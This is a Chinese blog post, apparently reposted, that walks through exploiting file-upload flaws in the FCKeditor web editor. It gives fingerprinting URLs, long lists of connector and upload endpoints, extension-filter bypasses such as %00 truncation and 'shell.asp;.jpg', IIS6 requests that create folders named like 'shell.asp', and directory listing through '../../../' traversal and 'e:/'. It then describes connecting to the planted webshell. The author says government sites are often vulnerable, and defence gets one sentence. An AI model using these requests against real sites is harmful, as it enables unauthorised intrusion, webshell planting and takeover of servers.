asp不能上传超过50k文件_FCKeditor文件上传漏洞及利用

最新推荐文章于 2024-03-16 13:45:00 发布
最新推荐文章于 2024-03-16 13:45:00 发布
阅读量152 收藏
点赞数
文章标签: asp不能上传超过50k文件 upload上传 内容绕过

  • 关于FCKeditor

  • 攻击思路

  • 总结

一. 关于FCKeditor

FCKeditor是一个网页的文本编辑器,在很多的cms里都有出现。近日工作期间遇到了不下十个有FCKeditor的站,尤其是ZF网站。

本文简单介绍通过FCKeditor上传漏洞进行攻击的思路,并对可能用到的操作进行整理。

二. 攻击思路

1.查看FCKeditor版本

12
http://127.0.0.1/fckeditor/editor/dialog/fck_about.htmlhttp://127.0.0.1/FCKeditor/_whatsnew.html

d854bd22259753a3ae38050031456a87.png

5f3597614a140bc921974a34f3e52ea7.png

2.测试上传点

123456789101112131415161718192021222324252627
FCKeditor/editor/filemanager/browser/default/connectors/test.htmlFCKeditor/editor/filemanager/upload/test.htmlFCKeditor/editor/filemanager/connectors/test.htmlFCKeditor/editor/filemanager/connectors/uploadtest.htmlFCKeditor/_samples/default.htmlFCKeditor/_samples/asp/sample01.aspFCKeditor/_samples/asp/sample02.aspFCKeditor/_samples/asp/sample03.aspFCKeditor/_samples/asp/sample04.aspFCKeditor/_samples/default.htmlFCKeditor/editor/fckeditor.htmFCKeditor/editor/fckdialog.htmlFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.phpFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.aspFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspxFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/connector.jspFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.aspFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jspfckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspxfckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php

3.突破限制

3.1 上传限制

上传限制的突破方式很多,主要还是抓包改扩展名,%00截断,添加文件头等

3.2 文件名限制
3.2.1二次上传绕过文件名‘ . ’ 修改为‘ _ ’

FCK在上传了诸如shell.asp;.jpg的文件后,会自动将文件名改为shell_asp;.jpg。可以继续上传同名文件,文件名会变为shell.asp;(1).jpg

3.2.2提交shell.php+空格绕过

空格只支持windows系统,linux系统是不支持的,可提交shell.php+空格来绕过文件名限制。

3.3 IIS6.0突破文件夹限制
123
Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.aspFCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

3.4 文件解析限制

通过Fckeditor编辑器在文件上传页面中,创建诸如1.asp文件夹,然后再到该文件夹下上传一个图片的webshell文件,获取其shell。

1
http://127.0.0.1/images/upload/201806/image/1.asp/1.jpg

4.列目录

4.1 FCKeditor/editor/fckeditor.html

FCKeditor/editor/fckeditor.html不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页,可以查看已经上传的文件。

4.2 根据xml返回信息查看网站目录
1
http://127.0.0.1/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
4.3 获取当前文件夹
123
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
4.4 浏览E盘文件
1
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/

5. 连接木马

在木马能够解析之后,使用各类工具连接到木马,获取webshell。至此,利用FCKeditor进行文件上传并攻击的过程就已经完成。

三. 其他

最近的工作中遇到的站里大多数都存在FCKeditor编辑器,基本都存在以上漏洞,可以说是非常严重的问题。

在获取到webshell之后,可以进行的操作非常多,也便于提权操作,拿下主机权限并不困难。

关于该漏洞的防御,可以删除掉所有的上传点,并限制目录访问。

a81ca6de336ea3fc8ffd622f200387bb.png

推荐阅读:

Fckeditor上传各版本绕过 | 内含彩蛋

Fckeditor漏洞Getshell

作者:Jacky Cheng

如有侵权,请联系删除

原文链接:https://cjjkkk.github.io/fckeditor-upload/

80a6004d8d16ee7f40dd15b1e1c34221.gif

weixin_39551103
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fckeditor文件上传getshell
千寻的博客
05-17 3313
第二次上传之后是111(1).asp(此时发现已经存在,进行重命名,进行截断)4、更改后缀.asp txt文件,使用hex更改20–00。window server 2019 的IIS搭建的网站。第一次上传之后是111.asp_txt(此时.变成了_)2、发现可以上传一个txt后缀的文件。3、但是无法上传asp文件。发现存在FCKeditor。1、访问编辑器,进行上传
FCKeditor 2.5 使用方法 配置ASP上传功能
judge9999的专栏
02-25 1008
FCKeditor 刚刚发布了FCKeditor 最新版本 2.5 ,拿到手以后就开始研究了一下,发现很多功能还不能使用,需要设置一下。                现在和大家一起分享一下!下载解压后,内部文件如图所示: 里面有FCKEditor编辑器程序包,在FCKEditor最新版本:FCKEditor 2.5版中提供了官方范例,在上图所示的_Samples,大家可以看看
fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御
qq_50854662的博客
11-08 4733
fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御
FCKEditor - 支持word上传的富文本编辑器
Mr_Zang666的博客
07-18 435
"Servers" :[{"url":"www.ncmem.com"},{"url":"www.xproerui.com"}]//内部服务器地址(不下载此地址中的图片)JPG/PNG/GIF/BMP,推荐使用JPG格式,防止出现大图片。, "PasteImageType" : "" //粘贴文件,剪帖板的图片格式,为空表示本地图片格式。, "PasteImgSrc" : "" //shape:优先使用源公式图片,img:使用word自动生成的图片。
文件上传(包括编辑器上传漏洞绕过总结(适用于pte考试、ctf及常规测试、修复任意文件上传漏洞可做参考)
最新发布
qq_44005305的博客
03-16 1135
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
FCKeditor文件上传漏洞利用-File-Upload-Vulnerability-in-FCKEditor1
08-03
Exploiting PHP Upload Module ofBypassing File-type CheckExploiting PHP Upload Mo
asp fckeditor自定义上传文件文件
01-20
只需要在fckeditor\editor\filemanager\connectors\asp文件夹下的commands.asp修改一下即可 在这个文件中查找一下:FileUpload 会找到这个函数 把 代码如下:Dim sFilePath sFilePath = CombineLocalPaths(sServerDir...
Asp.net FCKEditor 2.6.3 上传文件没有权限解决方法
10-30
到Fckeditor官方网站下载FredCK.FCKeditorV2.vs2005 (asp.net)
fckeditor上传文件按日期存放及重命名方法
12-19
1. 实现 fckeditor 按日期分目录的形式存放上传文件,比如今天是 2015年5月5日,那么今天上传文件都放在这个目录里面去,明天上传的则自动创建并放在类似 2015-05-06 这样的目录里面去。 (1)找到 editor\...
FCKEditor粘贴图片自动上传到服务器(Java版)
Mr_Zang666的博客
04-11 203
if (navigator.userAgent.match(/Trident/i) && navigator.userAgent.match(/MSIE 8.0/i)) { //判断浏览器内核是否为Trident内核IE8.0。// 当数据包大小不是数据单元的整数倍时,读取最后剩余的小于数据单元的所有数据。// 忽略简单form字段而不是上传域的文件域(等)然后访问http://localhost:8088/ueditor/ 就可以测试了。
FCKEDITOR 常用上传方法
10-30
FCKEDITOR 常用上传方法及上传位置
修改fckeditor文件上传功能步骤
10-30
虽然fckeditor自带了文件上传功能,但感觉自带的不方便使用。
FCKeditor上传漏洞与IIS6解析漏洞利用和修补
03-18
FCKeditor上传漏洞与IIS6解析漏洞利用和修补
asp fckeditor简单配置和上传设置,上传文件改名
lzqial1987的专栏
04-30 2585
程序瘦身需要留下的有根目录下:editor目录 、fckconfig.js、 fckeditor.asp fckeditor.js fckstyles.xml fcktemplates.xml 这几个保留,其余的全部去除;子目录下:editor/filemanager/connectors目录中 把asp目录留下(上传用什么方法就留下什么),其余的方法目录[php、aspx 等待 目录
fckeditor任意文件上传漏洞
u012684933的专栏
02-26 6256
1. 创建.htaccess文件内容如下: <FilesMatch "_php.gif"> SetHandler application/x-httpd-php .htaccess文件可以用来设置某个目录和某个目录的子目录的权限,以上内容的意思是将扩展名是"_php.gif"的文件解析成php 2.使用如下url,上
FCKeditor上传漏洞总结
热门推荐
龙哥盟
02-19 5万+
一、PHP网站的安全性问题针对PHP的网站主要存在下面几种攻击方式:1、命令注入(Command Injection) 2、eval注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL注入攻击(SQL injection) 6、跨网站请求伪造攻击(Cross Sit
fckeditor2.4.3 编辑器文件上传漏洞
黑面狐
04-24 4702
一个古老的漏洞记录一下。一、环境搭建与利用下载fckeditor2.4.3版本后用phpstudy搭建。2.4.3版本一下存在版本信息泄露查看目录/fckeditor/_whatsnew.html需要修改文件fckeditor\editor\filemanager\browser\default\connectors\php\config.php中的参数$Config['Enabled'] = T...
Fckeditor漏洞利用全面解析
weixin_34413802的博客
06-27 518
第一步:查看编辑器版本 FCKeditor/_whatsnew.html ————————————————————————————— 第二步. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 ————————————————————————————— 第三步.Version <=2.4.2 For php ...
fckeditor上传文件配置
笨笨的专栏
07-06 1432
配置fckeditor上传(php为例)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值